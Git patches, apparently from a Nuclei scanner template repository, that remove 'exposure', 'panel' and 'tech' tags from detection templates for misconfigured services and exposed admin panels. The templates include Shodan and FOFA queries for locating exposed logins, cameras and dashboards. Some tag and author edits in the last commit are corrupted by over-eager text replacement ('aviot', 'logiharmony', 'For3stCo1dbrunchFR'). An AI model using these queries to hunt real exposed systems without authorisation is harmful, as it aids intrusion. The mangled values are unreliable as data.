misconfig,tasmota,exposure,config + tags: misconfig,tasmota,config http: - method: GET diff --git a/http/misconfiguration/thinkphp-errors.yaml b/http/misconfiguration/thinkphp-errors.yaml index a45e16ea17..8fe1b460ae 100644 --- a/http/misconfiguration/thinkphp-errors.yaml +++ b/http/misconfiguration/thinkphp-errors.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true fofa-query: app="ThinkPHP" && title="System Error" - tags: thinkphp,misconfig,exposure + tags: thinkphp,misconfig http: - method: GET diff --git a/http/misconfiguration/tomcat-cookie-exposed.yaml b/http/misconfiguration/tomcat-cookie-exposed.yaml index 56e1118f57..57f7c49246 100644 --- a/http/misconfiguration/tomcat-cookie-exposed.yaml +++ b/http/misconfiguration/tomcat-cookie-exposed.yaml @@ -9,7 +9,7 @@ info: metadata: max-request: 1 verified: true - tags: misconfig,apache,tomcat,exposure + tags: misconfig,apache,tomcat http: - method: GET diff --git a/http/misconfiguration/transmission-dashboard.yaml b/http/misconfiguration/transmission-dashboard.yaml index 4f5af1a680..5de016568b 100644 --- a/http/misconfiguration/transmission-dashboard.yaml +++ b/http/misconfiguration/transmission-dashboard.yaml @@ -15,7 +15,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"Transmission Web Interface" - tags: misconfig,transmission,exposure,dashboard + tags: misconfig,transmission,dashboard http: - method: GET diff --git a/http/misconfiguration/typo3-composer.yaml b/http/misconfiguration/typo3-composer.yaml index 7f64d8c230..cf438e751e 100644 --- a/http/misconfiguration/typo3-composer.yaml +++ b/http/misconfiguration/typo3-composer.yaml @@ -12,7 +12,7 @@ info: max-request: 1 verified: true shodan-query: "X-TYPO3-Parsetime: 0ms" - tags: typo3,cms,exposure,misconfig + tags: typo3,cms,misconfig http: - method: GET diff --git a/http/misconfiguration/unauth-apache-kafka-ui.yaml b/http/misconfiguration/unauth-apache-kafka-ui.yaml index 6e129dca05..489ad5c6d6 100644 --- a/http/misconfiguration/unauth-apache-kafka-ui.yaml +++ b/http/misconfiguration/unauth-apache-kafka-ui.yaml @@ -12,7 +12,7 @@ info: max-request: 2 verified: true shodan-query: http.title:"UI for Apache Kafka" - tags: misconfig,apache,kafka,unauth,exposure + tags: misconfig,apache,kafka,unauth http: - method: GET diff --git a/http/misconfiguration/unauth-axyom-network-manager.yaml b/http/misconfiguration/unauth-axyom-network-manager.yaml index 38e5de4aea..b128f4976a 100644 --- a/http/misconfiguration/unauth-axyom-network-manager.yaml +++ b/http/misconfiguration/unauth-axyom-network-manager.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"Axyom Network Manager" - tags: misconfig,axyom,exposure,unauth + tags: misconfig,axyom,unauth http: - method: GET diff --git a/http/misconfiguration/unauth-kubecost.yaml b/http/misconfiguration/unauth-kubecost.yaml index 3c503b258c..05f95fa9af 100644 --- a/http/misconfiguration/unauth-kubecost.yaml +++ b/http/misconfiguration/unauth-kubecost.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: title:kubecost - tags: misconfig,exposure,unauth,kubecost + tags: misconfig,unauth,kubecost http: - method: GET diff --git a/http/misconfiguration/unauth-wavink-panel.yaml b/http/misconfiguration/unauth-wavink-panel.yaml index 5dd5bacf87..806b86f718 100644 --- a/http/misconfiguration/unauth-wavink-panel.yaml +++ b/http/misconfiguration/unauth-wavink-panel.yaml @@ -9,7 +9,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"Wi-Fi APP Login" - tags: exposure,wavlink,unauth,misconfig,router + tags: wavlink,unauth,misconfig,router http: - method: GET diff --git a/http/misconfiguration/unauthenticated-glances.yaml b/http/misconfiguration/unauthenticated-glances.yaml index 0cf9cc859e..7c1f206bb7 100644 --- a/http/misconfiguration/unauthenticated-glances.yaml +++ b/http/misconfiguration/unauthenticated-glances.yaml @@ -7,7 +7,7 @@ info: description: Glance running web server mode & Unauthenticated leads system monitoring to info disclosure reference: - https://glances.readthedocs.io/en/latest/quickstart.html#how-to-protect-your-server-or-web-server-with-a-login-password - tags: exposure,glances,misconfig + tags: glances,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/viewpoint-system-status.yaml b/http/misconfiguration/viewpoint-system-status.yaml index 6227b9ac40..0248c3ecc0 100644 --- a/http/misconfiguration/viewpoint-system-status.yaml +++ b/http/misconfiguration/viewpoint-system-status.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"ViewPoint System Status" - tags: status,exposure,viewpoint,misconfig + tags: status,viewpoint,misconfig http: - method: GET diff --git a/http/misconfiguration/wamp-server-configuration.yaml b/http/misconfiguration/wamp-server-configuration.yaml index 151267a9ab..d4ef85188d 100644 --- a/http/misconfiguration/wamp-server-configuration.yaml +++ b/http/misconfiguration/wamp-server-configuration.yaml @@ -6,7 +6,7 @@ info: severity: medium description: Wamp default page will expose sensitive configuration and vhosts. reference: https://www.exploit-db.com/ghdb/6891. - tags: wamp,exposure,misconfig + tags: wamp,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/webdav-enabled.yaml b/http/misconfiguration/webdav-enabled.yaml index 1b1d85d755..e8d0996cff 100644 --- a/http/misconfiguration/webdav-enabled.yaml +++ b/http/misconfiguration/webdav-enabled.yaml @@ -18,7 +18,7 @@ info: max-request: 3 verified: true shodan-query: "Ms-Author-Via: DAV" - tags: webdav,misconfig,exposure + tags: webdav,misconfig http: - raw: From d379d28ff6faf99bf8d53a698e8d657803f9c11b Mon Sep 17 00:00:00 2001 From: ErikOwen Date: Fri, 2 Jun 2023 16:28:51 -0700 Subject: [PATCH 139/609] remove panel tag from technologies templates --- http/technologies/catalog-creator-detect.yaml | 2 +- http/technologies/geo-webserver-detect.yaml | 2 +- http/technologies/hp-blade-admin-detect.yaml | 2 +- http/technologies/microstrategy-detect.yaml | 2 +- http/technologies/ntop-detect.yaml | 2 +- http/technologies/osquery-fleet-detect.yaml | 2 +- http/technologies/secui-waf-detect.yaml | 2 +- http/technologies/snipeit-panel.yaml | 2 +- http/technologies/sonicwall-email-security-detect.yaml | 2 +- http/technologies/swag-instance-default-page.yaml | 2 +- http/technologies/thinkcmf-detect.yaml | 2 +- http/technologies/tornado-server-login.yaml | 2 +- http/technologies/vmware/vmware-site-recovery-manager.yaml | 2 +- http/technologies/yeswiki-detect.yaml | 2 +- 14 files changed, 14 insertions(+), 14 deletions(-) diff --git a/http/technologies/catalog-creator-detect.yaml b/http/technologies/catalog-creator-detect.yaml index 0968811449..0810e45fc9 100644 --- a/http/technologies/catalog-creator-detect.yaml +++ b/http/technologies/catalog-creator-detect.yaml @@ -13,7 +13,7 @@ info: max-request: 2 verified: true shodan-query: http.html:"powered by CATALOGcreator" - tags: tech,catalogcreater,panel + tags: tech,catalogcreater http: - method: GET diff --git a/http/technologies/geo-webserver-detect.yaml b/http/technologies/geo-webserver-detect.yaml index de247fb3e0..f6d0943b05 100644 --- a/http/technologies/geo-webserver-detect.yaml +++ b/http/technologies/geo-webserver-detect.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"GeoWebServer" - tags: panel,geowebserver,tech + tags: geowebserver,tech http: - method: GET diff --git a/http/technologies/hp-blade-admin-detect.yaml b/http/technologies/hp-blade-admin-detect.yaml index 261a8f875e..06578b4521 100644 --- a/http/technologies/hp-blade-admin-detect.yaml +++ b/http/technologies/hp-blade-admin-detect.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"HP BladeSystem" - tags: panel,hp,tech + tags: hp,tech http: - method: GET diff --git a/http/technologies/microstrategy-detect.yaml b/http/technologies/microstrategy-detect.yaml index 4af8dcce45..fb1299a6bb 100644 --- a/http/technologies/microstrategy-detect.yaml +++ b/http/technologies/microstrategy-detect.yaml @@ -5,7 +5,7 @@ info: author: philippedelteil,Retr02332 severity: info description: Detect if MicroStrategy instances exist in your URLS - tags: microstrategy,panel,tech + tags: microstrategy,tech metadata: max-request: 16 diff --git a/http/technologies/ntop-detect.yaml b/http/technologies/ntop-detect.yaml index 0fdc136b4e..44c189d146 100644 --- a/http/technologies/ntop-detect.yaml +++ b/http/technologies/ntop-detect.yaml @@ -14,7 +14,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"welcome to ntop" - tags: tech,ntop,panel + tags: tech,ntop http: - method: GET diff --git a/http/technologies/osquery-fleet-detect.yaml b/http/technologies/osquery-fleet-detect.yaml index 3b535db6f5..e7eaa49faf 100644 --- a/http/technologies/osquery-fleet-detect.yaml +++ b/http/technologies/osquery-fleet-detect.yaml @@ -14,7 +14,7 @@ info: metadata: max-request: 1 shodan-query: http.favicon.hash:-1529860313 - tags: panel,fleet,osquery,tech + tags: fleet,osquery,tech http: - method: GET diff --git a/http/technologies/secui-waf-detect.yaml b/http/technologies/secui-waf-detect.yaml index 89f1ead87d..6e260a4648 100644 --- a/http/technologies/secui-waf-detect.yaml +++ b/http/technologies/secui-waf-detect.yaml @@ -15,7 +15,7 @@ info: max-request: 1 verified: true shodan-query: http.favicon.hash:-1101206929 - tags: tech,panel,secui + tags: tech,secui http: - method: GET diff --git a/http/technologies/snipeit-panel.yaml b/http/technologies/snipeit-panel.yaml index ae9d618fb9..936eadaf4e 100644 --- a/http/technologies/snipeit-panel.yaml +++ b/http/technologies/snipeit-panel.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: http.favicon.hash:431627549 - tags: panel,snipeit,tech + tags: snipeit,tech http: - method: GET diff --git a/http/technologies/sonicwall-email-security-detect.yaml b/http/technologies/sonicwall-email-security-detect.yaml index 312cf7db4a..e02aceab25 100644 --- a/http/technologies/sonicwall-email-security-detect.yaml +++ b/http/technologies/sonicwall-email-security-detect.yaml @@ -12,7 +12,7 @@ info: reference: - https://www.fireeye.com/blog/threat-research/2021/04/zero-day-exploits-in-sonicwall-email-security-lead-to-compromise.html - https://www.sonicwall.com/support/product-notification/security-notice-sonicwall-email-security-zero-day-vulnerabilities/210416112932360/ - tags: tech,panel,sonicwall + tags: tech,sonicwall metadata: max-request: 1 diff --git a/http/technologies/swag-instance-default-page.yaml b/http/technologies/swag-instance-default-page.yaml index fd1fa66305..576b154a7d 100644 --- a/http/technologies/swag-instance-default-page.yaml +++ b/http/technologies/swag-instance-default-page.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: title:"Welcome to your SWAG instance" - tags: panel,tech + tags: tech http: - method: GET diff --git a/http/technologies/thinkcmf-detect.yaml b/http/technologies/thinkcmf-detect.yaml index 643a08fce4..8d1a2c78c6 100644 --- a/http/technologies/thinkcmf-detect.yaml +++ b/http/technologies/thinkcmf-detect.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: panel,thinkcmf,login,tech + tags: thinkcmf,login,tech metadata: max-request: 1 diff --git a/http/technologies/tornado-server-login.yaml b/http/technologies/tornado-server-login.yaml index b980e316cb..1cf8264ce9 100644 --- a/http/technologies/tornado-server-login.yaml +++ b/http/technologies/tornado-server-login.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: title:"Tornado - Login" - tags: panel,tornado,tech + tags: tornado,tech http: - method: GET diff --git a/http/technologies/vmware/vmware-site-recovery-manager.yaml b/http/technologies/vmware/vmware-site-recovery-manager.yaml index bef73f47a1..2a7b4673b1 100644 --- a/http/technologies/vmware/vmware-site-recovery-manager.yaml +++ b/http/technologies/vmware/vmware-site-recovery-manager.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Welcome to VMware Site Recovery Manager" - tags: panel,vmware,tech + tags: vmware,tech http: - method: GET diff --git a/http/technologies/yeswiki-detect.yaml b/http/technologies/yeswiki-detect.yaml index b66435ea71..5108b205e2 100644 --- a/http/technologies/yeswiki-detect.yaml +++ b/http/technologies/yeswiki-detect.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: http.html:"yeswiki" - tags: yeswiki,panel,tech + tags: yeswiki,tech http: - method: GET From e1cc60a07421b9e77c8d2783856e70fe67086d21 Mon Sep 17 00:00:00 2001 From: ErikOwen Date: Fri, 2 Jun 2023 16:29:32 -0700 Subject: [PATCH 140/609] remove exposure tag from technologies templates --- http/technologies/json-server.yaml | 2 +- http/technologies/nimsoft-wasp.yaml | 2 +- http/technologies/puppetdb-detect.yaml | 2 +- http/technologies/puppetserver-detect.yaml | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/http/technologies/json-server.yaml b/http/technologies/json-server.yaml index cee4cfcff5..684fab66af 100644 --- a/http/technologies/json-server.yaml +++ b/http/technologies/json-server.yaml @@ -9,7 +9,7 @@ info: max-request: 1 verified: true shodan-query: title:"JSON Server" - tags: exposure,devops,tech + tags: devops,tech http: - method: GET diff --git a/http/technologies/nimsoft-wasp.yaml b/http/technologies/nimsoft-wasp.yaml index 81bd555282..4102c8cc62 100644 --- a/http/technologies/nimsoft-wasp.yaml +++ b/http/technologies/nimsoft-wasp.yaml @@ -5,7 +5,7 @@ info: author: Nullfuzz severity: info description: Detect Nimsoft Wasp WebPage - tags: nimsoft,exposure,tech + tags: nimsoft,tech metadata: max-request: 1 diff --git a/http/technologies/puppetdb-detect.yaml b/http/technologies/puppetdb-detect.yaml index 260f0187c8..ac1b041f6c 100644 --- a/http/technologies/puppetdb-detect.yaml +++ b/http/technologies/puppetdb-detect.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://puppet.com/docs/puppetdb/7/api/meta/v1/version.html#pdbmetav1version - tags: puppet,tech,exposure + tags: puppet,tech metadata: max-request: 1 diff --git a/http/technologies/puppetserver-detect.yaml b/http/technologies/puppetserver-detect.yaml index 3f00b0a062..fa1e5d9faa 100644 --- a/http/technologies/puppetserver-detect.yaml +++ b/http/technologies/puppetserver-detect.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://insinuator.net/2020/09/puppet-assessment-techniques/ - tags: tech,puppet,exposure + tags: tech,puppet metadata: max-request: 1 From bf2caee9b14411c80a147270eaee1dc45cd1d419 Mon Sep 17 00:00:00 2001 From: ErikOwen Date: Fri, 2 Jun 2023 16:32:36 -0700 Subject: [PATCH 141/609] remove tech tag from exposed panels templates --- http/exposed-panels/acemanager-login.yaml | 2 +- http/exposed-panels/aerohive-netconfig-ui.yaml | 2 +- http/exposed-panels/alfresco-detect.yaml | 2 +- http/exposed-panels/avtech-avn801-camera-panel.yaml | 2 +- http/exposed-panels/avtech-dvr-exposure.yaml | 2 +- http/exposed-panels/cacti-panel.yaml | 2 +- http/exposed-panels/checkmk/checkmk-login.yaml | 2 +- http/exposed-panels/edgeos-login.yaml | 2 +- http/exposed-panels/extreme-netconfig-ui.yaml | 2 +- http/exposed-panels/fastapi-docs.yaml | 2 +- http/exposed-panels/fatpipe-mpvpn-panel.yaml | 2 +- http/exposed-panels/fatpipe-warp-panel.yaml | 2 +- http/exposed-panels/footprints-panel.yaml | 2 +- http/exposed-panels/gerapy-detect.yaml | 2 +- http/exposed-panels/hashicorp-consul-agent.yaml | 2 +- http/exposed-panels/hpe-system-management-login.yaml | 2 +- http/exposed-panels/kenesto-login.yaml | 2 +- http/exposed-panels/konga-panel.yaml | 2 +- http/exposed-panels/kubernetes-enterprise-manager.yaml | 2 +- http/exposed-panels/kubernetes-mirantis.yaml | 2 +- http/exposed-panels/lansweeper-login.yaml | 2 +- http/exposed-panels/linksys-wifi-login.yaml | 2 +- http/exposed-panels/logitech-harmony-portal.yaml | 2 +- http/exposed-panels/mautic-crm-panel.yaml | 2 +- http/exposed-panels/netdata-dashboard-detected.yaml | 2 +- http/exposed-panels/openwrt-login.yaml | 2 +- http/exposed-panels/roxy-fileman.yaml | 2 +- http/exposed-panels/skycaiji-admin-panel.yaml | 2 +- http/exposed-panels/slocum-login.yaml | 2 +- http/exposed-panels/spiderfoot.yaml | 2 +- http/exposed-panels/synology-rackstation-login.yaml | 2 +- http/exposed-panels/xds-amr-status.yaml | 2 +- http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml | 2 +- http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml | 2 +- 34 files changed, 34 insertions(+), 34 deletions(-) diff --git a/http/exposed-panels/acemanager-login.yaml b/http/exposed-panels/acemanager-login.yaml index d8381f6348..fe92f2073c 100644 --- a/http/exposed-panels/acemanager-login.yaml +++ b/http/exposed-panels/acemanager-login.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 1 fofa-query: app="ACEmanager" - tags: panel,login,tech,acemanager + tags: panel,login,acemanager http: - method: GET diff --git a/http/exposed-panels/aerohive-netconfig-ui.yaml b/http/exposed-panels/aerohive-netconfig-ui.yaml index cb1d502632..710cebb49a 100644 --- a/http/exposed-panels/aerohive-netconfig-ui.yaml +++ b/http/exposed-panels/aerohive-netconfig-ui.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Aerohive NetConfig UI" - tags: panel,tech,hiveos,aerohive + tags: panel,hiveos,aerohive http: - method: GET diff --git a/http/exposed-panels/alfresco-detect.yaml b/http/exposed-panels/alfresco-detect.yaml index 8901bdf5bc..7109e4830b 100644 --- a/http/exposed-panels/alfresco-detect.yaml +++ b/http/exposed-panels/alfresco-detect.yaml @@ -9,7 +9,7 @@ info: - https://www.alfresco.com/ classification: cwe-id: CWE-200 - tags: alfresco,tech,panel + tags: alfresco,panel metadata: max-request: 1 diff --git a/http/exposed-panels/avtech-avn801-camera-panel.yaml b/http/exposed-panels/avtech-avn801-camera-panel.yaml index c7872801c2..8c05fa6ea3 100644 --- a/http/exposed-panels/avtech-avn801-camera-panel.yaml +++ b/http/exposed-panels/avtech-avn801-camera-panel.yaml @@ -14,7 +14,7 @@ info: metadata: max-request: 1 shodan-query: title:"login" product:"Avtech AVN801 network camera" - tags: panel,avtech,iot,camera + tags: panel,aviot,camera http: - method: GET diff --git a/http/exposed-panels/avtech-dvr-exposure.yaml b/http/exposed-panels/avtech-dvr-exposure.yaml index 939d01c109..daca8d9bb6 100644 --- a/http/exposed-panels/avtech-dvr-exposure.yaml +++ b/http/exposed-panels/avtech-dvr-exposure.yaml @@ -7,7 +7,7 @@ info: description: AVTECH AVC798HA DVR is susceptible to information exposure. CGI scripts in the /cgi-bin/nobody directory can be accessed without authentication. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. reference: - http://www.avtech.com.tw/ - tags: dvr,avtech,panel + tags: dvr,avpanel metadata: max-request: 1 diff --git a/http/exposed-panels/cacti-panel.yaml b/http/exposed-panels/cacti-panel.yaml index e7c86eac51..1b97b5ee39 100644 --- a/http/exposed-panels/cacti-panel.yaml +++ b/http/exposed-panels/cacti-panel.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: tech,cacti,login + tags: cacti,login metadata: max-request: 2 diff --git a/http/exposed-panels/checkmk/checkmk-login.yaml b/http/exposed-panels/checkmk/checkmk-login.yaml index 90240aa3b9..14e8742e56 100644 --- a/http/exposed-panels/checkmk/checkmk-login.yaml +++ b/http/exposed-panels/checkmk/checkmk-login.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: login,tech,synology,rackstation + tags: login,synology,rackstation metadata: max-request: 1 diff --git a/http/exposed-panels/edgeos-login.yaml b/http/exposed-panels/edgeos-login.yaml index b37c9b60dc..25766474da 100644 --- a/http/exposed-panels/edgeos-login.yaml +++ b/http/exposed-panels/edgeos-login.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: login,tech,edgeos,edgemax + tags: login,edgeos,edgemax metadata: max-request: 1 diff --git a/http/exposed-panels/extreme-netconfig-ui.yaml b/http/exposed-panels/extreme-netconfig-ui.yaml index a066a4b876..04d9c70571 100644 --- a/http/exposed-panels/extreme-netconfig-ui.yaml +++ b/http/exposed-panels/extreme-netconfig-ui.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: 'http.title:"Extreme NetConfig UI"' - tags: panel,tech,hiveos,extreme + tags: panel,hiveos,extreme http: - method: GET diff --git a/http/exposed-panels/fastapi-docs.yaml b/http/exposed-panels/fastapi-docs.yaml index 441e86017a..ee4920c632 100644 --- a/http/exposed-panels/fastapi-docs.yaml +++ b/http/exposed-panels/fastapi-docs.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: fastapi,tech,panel + tags: fastapi,panel metadata: max-request: 3 diff --git a/http/exposed-panels/fatpipe-mpvpn-panel.yaml b/http/exposed-panels/fatpipe-mpvpn-panel.yaml index 410250d0ef..14ddbfc2b1 100644 --- a/http/exposed-panels/fatpipe-mpvpn-panel.yaml +++ b/http/exposed-panels/fatpipe-mpvpn-panel.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: tech,fatpipe,panel + tags: fatpipe,panel http: - method: GET diff --git a/http/exposed-panels/fatpipe-warp-panel.yaml b/http/exposed-panels/fatpipe-warp-panel.yaml index 0926568a94..e3b320c4ce 100644 --- a/http/exposed-panels/fatpipe-warp-panel.yaml +++ b/http/exposed-panels/fatpipe-warp-panel.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: tech,fatpipe,panel + tags: fatpipe,panel http: - method: GET diff --git a/http/exposed-panels/footprints-panel.yaml b/http/exposed-panels/footprints-panel.yaml index 6d19a3102d..5cee16c9a3 100644 --- a/http/exposed-panels/footprints-panel.yaml +++ b/http/exposed-panels/footprints-panel.yaml @@ -13,7 +13,7 @@ info: max-request: 2 verified: true shodan-query: title:"FootPrints Service Core Login" - tags: tech,panel,footprints + tags: panel,footprints http: - method: GET diff --git a/http/exposed-panels/gerapy-detect.yaml b/http/exposed-panels/gerapy-detect.yaml index dea5de7a30..11db931c56 100644 --- a/http/exposed-panels/gerapy-detect.yaml +++ b/http/exposed-panels/gerapy-detect.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: tech,gerapy,panel + tags: gerapy,panel metadata: max-request: 1 diff --git a/http/exposed-panels/hashicorp-consul-agent.yaml b/http/exposed-panels/hashicorp-consul-agent.yaml index 227da1ea1a..c0fb7e517f 100644 --- a/http/exposed-panels/hashicorp-consul-agent.yaml +++ b/http/exposed-panels/hashicorp-consul-agent.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: tech,consul,api,panel + tags: consul,api,panel metadata: max-request: 1 diff --git a/http/exposed-panels/hpe-system-management-login.yaml b/http/exposed-panels/hpe-system-management-login.yaml index f61bc60a0c..d1c897b1da 100644 --- a/http/exposed-panels/hpe-system-management-login.yaml +++ b/http/exposed-panels/hpe-system-management-login.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: hpe,tech,panel + tags: hpe,panel metadata: max-request: 1 diff --git a/http/exposed-panels/kenesto-login.yaml b/http/exposed-panels/kenesto-login.yaml index 64674b2c82..806ec29a9b 100644 --- a/http/exposed-panels/kenesto-login.yaml +++ b/http/exposed-panels/kenesto-login.yaml @@ -8,7 +8,7 @@ info: metadata: max-request: 1 fofa-query: 'app="kenesto"' - tags: login,tech,kenesto,panel + tags: login,kenesto,panel reference: - https://www.kenesto.com/ classification: diff --git a/http/exposed-panels/konga-panel.yaml b/http/exposed-panels/konga-panel.yaml index 5119178e42..271ca5f553 100644 --- a/http/exposed-panels/konga-panel.yaml +++ b/http/exposed-panels/konga-panel.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: tech,konga,oss + tags: konga,oss metadata: max-request: 1 diff --git a/http/exposed-panels/kubernetes-enterprise-manager.yaml b/http/exposed-panels/kubernetes-enterprise-manager.yaml index e5f423d2de..372449976f 100644 --- a/http/exposed-panels/kubernetes-enterprise-manager.yaml +++ b/http/exposed-panels/kubernetes-enterprise-manager.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 fofa-query: app="Kubernetes-Enterprise-Manager" - tags: tech,kubernetes + tags: kubernetes http: - method: GET diff --git a/http/exposed-panels/kubernetes-mirantis.yaml b/http/exposed-panels/kubernetes-mirantis.yaml index bb4037ac21..4c59df79b0 100644 --- a/http/exposed-panels/kubernetes-mirantis.yaml +++ b/http/exposed-panels/kubernetes-mirantis.yaml @@ -14,7 +14,7 @@ info: verified: true shodan-query: http.html:"Mirantis Kubernetes Engine" fofa-query: app="Mirantis-Kubernetes-Engine" - tags: tech,kubernetes,devops,kube,k8s + tags: kubernetes,devops,kube,k8s http: - method: GET diff --git a/http/exposed-panels/lansweeper-login.yaml b/http/exposed-panels/lansweeper-login.yaml index ffdb5c0e82..c4631bd565 100644 --- a/http/exposed-panels/lansweeper-login.yaml +++ b/http/exposed-panels/lansweeper-login.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: title:"Lansweeper - Login" - tags: lansweeper,tech,panel + tags: lansweeper,panel http: - method: GET diff --git a/http/exposed-panels/linksys-wifi-login.yaml b/http/exposed-panels/linksys-wifi-login.yaml index 3c9831868c..f4b916e0a9 100644 --- a/http/exposed-panels/linksys-wifi-login.yaml +++ b/http/exposed-panels/linksys-wifi-login.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Linksys Smart WI-FI" - tags: tech,panel,linksys,iot + tags: panel,linksys,iot http: - method: GET diff --git a/http/exposed-panels/logitech-harmony-portal.yaml b/http/exposed-panels/logitech-harmony-portal.yaml index 2695f91cb4..946c229ff4 100644 --- a/http/exposed-panels/logitech-harmony-portal.yaml +++ b/http/exposed-panels/logitech-harmony-portal.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"Logitech Harmony Pro Installer" - tags: panel,logitech,harmony + tags: panel,logiharmony http: - method: GET diff --git a/http/exposed-panels/mautic-crm-panel.yaml b/http/exposed-panels/mautic-crm-panel.yaml index dc2215d232..cbad1023e7 100644 --- a/http/exposed-panels/mautic-crm-panel.yaml +++ b/http/exposed-panels/mautic-crm-panel.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: tech,mautic,crm + tags: mautic,crm metadata: max-request: 1 diff --git a/http/exposed-panels/netdata-dashboard-detected.yaml b/http/exposed-panels/netdata-dashboard-detected.yaml index 707beb63e8..c69562147c 100644 --- a/http/exposed-panels/netdata-dashboard-detected.yaml +++ b/http/exposed-panels/netdata-dashboard-detected.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: 'Server: NetData Embedded HTTP Server' - tags: netdata,panel,tech + tags: netdata,panel http: - method: GET diff --git a/http/exposed-panels/openwrt-login.yaml b/http/exposed-panels/openwrt-login.yaml index d5f773d5b5..3162f7e958 100644 --- a/http/exposed-panels/openwrt-login.yaml +++ b/http/exposed-panels/openwrt-login.yaml @@ -2,7 +2,7 @@ id: openwrt-login info: name: Opentwrt Login / Configuration Interface - author: For3stCo1d,TechbrunchFR + author: For3stCo1dbrunchFR severity: info reference: - https://openwrt.org diff --git a/http/exposed-panels/roxy-fileman.yaml b/http/exposed-panels/roxy-fileman.yaml index b76716cc35..8ce126dd83 100644 --- a/http/exposed-panels/roxy-fileman.yaml +++ b/http/exposed-panels/roxy-fileman.yaml @@ -13,7 +13,7 @@ info: max-request: 4 verified: true google-query: intitle:"Roxy file manager" - tags: tech,fileupload,roxy,fileman + tags: fileupload,roxy,fileman http: - method: GET diff --git a/http/exposed-panels/skycaiji-admin-panel.yaml b/http/exposed-panels/skycaiji-admin-panel.yaml index da64ab36cf..913636798d 100644 --- a/http/exposed-panels/skycaiji-admin-panel.yaml +++ b/http/exposed-panels/skycaiji-admin-panel.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: panel,tech,skycaiji + tags: panel,skycaiji metadata: max-request: 1 diff --git a/http/exposed-panels/slocum-login.yaml b/http/exposed-panels/slocum-login.yaml index c8e67da8ec..673a5f6eff 100644 --- a/http/exposed-panels/slocum-login.yaml +++ b/http/exposed-panels/slocum-login.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: panel,tech,slocum + tags: panel,slocum metadata: max-request: 1 diff --git a/http/exposed-panels/spiderfoot.yaml b/http/exposed-panels/spiderfoot.yaml index 6528688dcb..4661f6f051 100644 --- a/http/exposed-panels/spiderfoot.yaml +++ b/http/exposed-panels/spiderfoot.yaml @@ -9,7 +9,7 @@ 